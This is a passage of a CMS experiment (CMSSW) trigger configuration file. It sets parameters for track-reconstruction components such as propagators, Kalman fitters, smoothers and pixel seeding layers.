\"hltESPTTRHBuilderPixelOnly\" ),\n StripCPE = cms.string( \"Fake\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n Matcher = cms.string( \"StandardMatcher\" ),\n ComputeCoarseLocalPositionFromDisk = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPTTRHBWithTrackAngle = cms.ESProducer( \"TkTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n Matcher = cms.string( \"StandardMatcher\" ),\n ComputeCoarseLocalPositionFromDisk = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPStraightLinePropagator = cms.ESProducer( \"StraightLinePropagatorESProducer\",\n ComponentName = cms.string( \"hltESPStraightLinePropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSteppingHelixPropagatorOpposite = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPSteppingHelixPropagatorOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( False ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSteppingHelixPropagatorAlong = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPSteppingHelixPropagatorAlong\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( False ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSoftLeptonByPt = cms.ESProducer( \"LeptonTaggerByPtESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ipSign = cms.string( \"any\" )\n)\nhltESPSoftLeptonByDistance = cms.ESProducer( \"LeptonTaggerByDistanceESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n distance = cms.double( 0.5 )\n)\nhltESPSmartPropagatorOpposite = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPSmartPropagatorOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterialOpposite\" ),\n MuonPropagator = cms.string( \"hltESPSteppingHelixPropagatorOpposite\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSmartPropagatorAnyOpposite = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPSmartPropagatorAnyOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterialOpposite\" ),\n MuonPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSmartPropagatorAny = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPSmartPropagatorAny\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterial\" ),\n MuonPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSmartPropagator = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPSmartPropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterial\" ),\n MuonPropagator = cms.string( \"hltESPSteppingHelixPropagatorAlong\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPSiStripRegionConnectivity = cms.ESProducer( \"SiStripRegionConnectivity\",\n EtaDivisions = cms.untracked.uint32( 20 ),\n PhiDivisions = cms.untracked.uint32( 20 ),\n EtaMax = cms.untracked.double( 2.5 )\n)\nhltESPRungeKuttaTrackerPropagator = cms.ESProducer( \"PropagatorWithMaterialESProducer\",\n ComponentName = cms.string( \"hltESPRungeKuttaTrackerPropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Mass = cms.double( 0.105 ),\n MaxDPhi = cms.double( 1.6 ),\n useRungeKutta = cms.bool( True ),\n ptMin = cms.double( -1.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPPromptTrackCountingESProducer = cms.ESProducer( \"PromptTrackCountingESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n impactParameterType = cms.int32( 0 ),\n maximumDistanceToJetAxis = cms.double( 999999.0 ),\n deltaR = cms.double( -1.0 ),\n maximumDecayLength = cms.double( 999999.0 ),\n maxImpactParameterSig = cms.double( 999999.0 ),\n trackQualityClass = cms.string( \"any\" ),\n nthTrack = cms.int32( -1 ),\n maxImpactParameter = cms.double( 0.03 ),\n deltaRmin = cms.double( 0.0 )\n)\nhltESPPixelLayerTripletsHITHE = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPPixelLayerTripletsHITHE\" ),\n layerList = cms.vstring( 'BPix1+BPix2+FPix1_pos',\n 'BPix1+BPix2+FPix1_neg',\n 'BPix1+FPix1_pos+FPix2_pos',\n 'BPix1+FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPPixelLayerTripletsHITHB = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPPixelLayerTripletsHITHB\" ),\n layerList = cms.vstring( 'BPix1+BPix2+BPix3' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPPixelLayerTriplets = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPPixelLayerTriplets\" ),\n layerList = cms.vstring( 'BPix1+BPix2+BPix3',\n 'BPix1+BPix2+FPix1_pos',\n 'BPix1+BPix2+FPix1_neg',\n 'BPix1+FPix1_pos+FPix2_pos',\n 'BPix1+FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPPixelLayerPairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPPixelLayerPairs\" ),\n layerList = cms.vstring( 'BPix1+BPix2',\n 'BPix1+BPix3',\n 'BPix2+BPix3',\n 'BPix1+FPix1_pos',\n 'BPix1+FPix1_neg',\n 'BPix1+FPix2_pos',\n 'BPix1+FPix2_neg',\n 'BPix2+FPix1_pos',\n 'BPix2+FPix1_neg',\n 'BPix2+FPix2_pos',\n 'BPix2+FPix2_neg',\n 'FPix1_pos+FPix2_pos',\n 'FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPPixelCPEGeneric = cms.ESProducer( \"PixelCPEGenericESProducer\",\n ComponentName = cms.string( \"hltESPPixelCPEGeneric\" ),\n eff_charge_cut_lowX = cms.double( 0.0 ),\n eff_charge_cut_lowY = cms.double( 0.0 ),\n eff_charge_cut_highX = cms.double( 1.0 ),\n eff_charge_cut_highY = cms.double( 1.0 ),\n size_cutX = cms.double( 3.0 ),\n size_cutY = cms.double( 3.0 ),\n EdgeClusterErrorX = cms.double( 50.0 ),\n EdgeClusterErrorY = cms.double( 85.0 ),\n inflate_errors = cms.bool( False ),\n inflate_all_errors_no_trk_angle = cms.bool( False ),\n UseErrorsFromTemplates = cms.bool( True ),\n TruncatePixelCharge = cms.bool( True ),\n IrradiationBiasCorrection = cms.bool( False ),\n DoCosmics = cms.bool( False ),\n LoadTemplatesFromDB = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n TanLorentzAnglePerTesla = cms.double( 0.106 ),\n PixelErrorParametrization = cms.string( \"NOTcmsim\" ),\n Alpha2Order = cms.bool( True ),\n ClusterProbComputationFlag = cms.int32( 0 )\n)\nhltESPMuonTransientTrackingRecHitBuilder = cms.ESProducer( \"MuonTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"hltESPMuonTransientTrackingRecHitBuilder\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPMuonCkfTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPMuonCkfTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n chargeSignificance = cms.double( -1.0 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( -1 ),\n maxConsecLostHits = cms.int32( 1 ),\n minimumNumberOfHits = cms.int32( 5 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.9 )\n )\n)\nhltESPMuonCkfTrajectoryBuilder = cms.ESProducer( \"MuonCkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPMuonCkfTrajectoryBuilder\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n propagatorProximity = cms.string( \"SteppingHelixPropagatorAny\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPMuonCkfTrajectoryFilter\" ),\n useSeedLayer = cms.bool( False ),\n rescaleErrorIfFail = cms.double( 1.0 ),\n deltaEta = cms.double( 0.1 ),\n deltaPhi = cms.double( 0.1 ),\n appendToDataLabel = cms.string( \"\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( False ),\n alwaysUseInvalidHits = cms.bool( True )\n)\nhltESPMuTrackJpsiTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPMuTrackJpsiTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 5 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 8 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 1.0 )\n )\n)\nhltESPMuTrackJpsiTrajectoryBuilder = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPMuTrackJpsiTrajectoryBuilder\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPMuTrackJpsiTrajectoryFilter\" ),\n maxCand = cms.int32( 1 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPMixedLayerPairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPMixedLayerPairs\" ),\n layerList = cms.vstring( 'BPix1+BPix2',\n 'BPix1+BPix3',\n 'BPix2+BPix3',\n 'BPix1+FPix1_pos',\n 'BPix1+FPix1_neg',\n 'BPix1+FPix2_pos',\n 'BPix1+FPix2_neg',\n 'BPix2+FPix1_pos',\n 'BPix2+FPix1_neg',\n 'BPix2+FPix2_pos',\n 'BPix2+FPix2_neg',\n 'FPix1_pos+FPix2_pos',\n 'FPix1_neg+FPix2_neg',\n 'FPix2_pos+TEC1_pos',\n 'FPix2_pos+TEC2_pos',\n 'TEC1_pos+TEC2_pos',\n 'TEC2_pos+TEC3_pos',\n 'FPix2_neg+TEC1_neg',\n 'FPix2_neg+TEC2_neg',\n 'TEC1_neg+TEC2_neg',\n 'TEC2_neg+TEC3_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( \n useRingSlector = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n minRing = cms.int32( 1 ),\n maxRing = cms.int32( 1 )\n ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPL3MuKFTrajectoryFitter = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"hltESPL3MuKFTrajectoryFitter\" ),\n Propagator = cms.string( \"hltESPSmartPropagatorAny\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFUpdator = cms.ESProducer( \"KFUpdatorESProducer\",\n ComponentName = cms.string( \"hltESPKFUpdator\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFTrajectorySmootherForMuonTrackLoader = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"hltESPKFTrajectorySmootherForMuonTrackLoader\" ),\n Propagator = cms.string( \"hltESPSmartPropagatorAnyOpposite\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 10.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFTrajectorySmootherForL2Muon = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"hltESPKFTrajectorySmootherForL2Muon\" ),\n Propagator = cms.string( \"hltESPFastSteppingHelixPropagatorOpposite\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFTrajectorySmoother = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"hltESPKFTrajectorySmoother\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFTrajectoryFitterForL2Muon = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"hltESPKFTrajectoryFitterForL2Muon\" ),\n Propagator = cms.string( \"hltESPFastSteppingHelixPropagatorAny\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFTrajectoryFitter = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"hltESPKFTrajectoryFitter\" ),\n Propagator = cms.string( \"PropagatorWithMaterial\" ),\n Updator = cms.string( \"hltESPKFUpdator\" ),\n Estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n RecoGeometry = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFFittingSmootherForL2Muon = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"hltESPKFFittingSmootherForL2Muon\" ),\n Fitter = cms.string( \"hltESPKFTrajectoryFitterForL2Muon\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmootherForL2Muon\" ),\n EstimateCut = cms.double( -1.0 ),\n LogPixelProbabilityCut = cms.double( -16.0 ),\n MinNumberOfHits = cms.int32( 5 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( False ),\n NoInvalidHitsBeginEnd = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFFittingSmoother = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"hltESPKFFittingSmoother\" ),\n Fitter = cms.string( \"hltESPKFTrajectoryFitter\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmoother\" ),\n EstimateCut = cms.double( -1.0 ),\n LogPixelProbabilityCut = cms.double( -16.0 ),\n MinNumberOfHits = cms.int32( 5 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( False ),\n NoInvalidHitsBeginEnd = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPHITTRHBuilderWithoutRefit = cms.ESProducer( \"TkTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"hltESPHITTRHBuilderWithoutRefit\" ),\n StripCPE = cms.string( \"Fake\" ),\n PixelCPE = cms.string( \"Fake\" ),\n Matcher = cms.string( \"Fake\" ),\n ComputeCoarseLocalPositionFromDisk = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPHIPixelLayerTriplets = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPHIPixelLayerTriplets\" ),\n layerList = cms.vstring( 'BPix1+BPix2+BPix3',\n 'BPix1+BPix2+FPix1_pos',\n 'BPix1+BPix2+FPix1_neg',\n 'BPix1+FPix1_pos+FPix2_pos',\n 'BPix1+FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltHISiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltHISiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPHIPixelLayerPairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPHIPixelLayerPairs\" ),\n layerList = cms.vstring( 'BPix1+BPix2',\n 'BPix1+BPix3',\n 'BPix2+BPix3',\n 'BPix1+FPix1_pos',\n 'BPix1+FPix1_neg',\n 'BPix1+FPix2_pos',\n 'BPix1+FPix2_neg',\n 'BPix2+FPix1_pos',\n 'BPix2+FPix1_neg',\n 'BPix2+FPix2_pos',\n 'BPix2+FPix2_neg',\n 'FPix1_pos+FPix2_pos',\n 'FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltHISiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltHISiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPFittingSmootherRK = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"hltESPFittingSmootherRK\" ),\n Fitter = cms.string( \"hltESPTrajectoryFitterRK\" ),\n Smoother = cms.string( \"hltESPTrajectorySmootherRK\" ),\n EstimateCut = cms.double( -1.0 ),\n LogPixelProbabilityCut = cms.double( -16.0 ),\n MinNumberOfHits = cms.int32( 5 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( False ),\n NoInvalidHitsBeginEnd = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPFastSteppingHelixPropagatorOpposite = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPFastSteppingHelixPropagatorOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( True ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPFastSteppingHelixPropagatorAny = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPFastSteppingHelixPropagatorAny\" ),\n PropagationDirection = cms.string( \"anyDirection\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( True ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPEcalRegionCablingESProducer = cms.ESProducer( \"EcalRegionCablingESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n esMapping = cms.PSet( LookupTable = cms.FileInPath( \"EventFilter/ESDigiToRaw/data/ES_lookup_table.dat\" ) )\n)\nhltESPESUnpackerWorker = cms.ESProducer( \"ESUnpackerWorkerESProducer\",\n ComponentName = cms.string( \"hltESPESUnpackerWorker\" ),\n appendToDataLabel = cms.string( \"\" ),\n DCCDataUnpacker = cms.PSet( LookupTable = cms.FileInPath( \"EventFilter/ESDigiToRaw/data/ES_lookup_table.dat\" ) ),\n RHAlgo = cms.PSet( \n ESRecoAlgo = cms.int32( 0 ),\n Type = cms.string( \"ESRecHitWorker\" )\n )\n)\nhltESPDummyDetLayerGeometry = cms.ESProducer( \"DetLayerGeometryESProducer\",\n ComponentName = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPCkfTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPCkfTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 5 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( -1 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.9 )\n )\n)\nhltESPCkfTrajectoryBuilder = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPCkfTrajectoryBuilder\" ),\n updator = 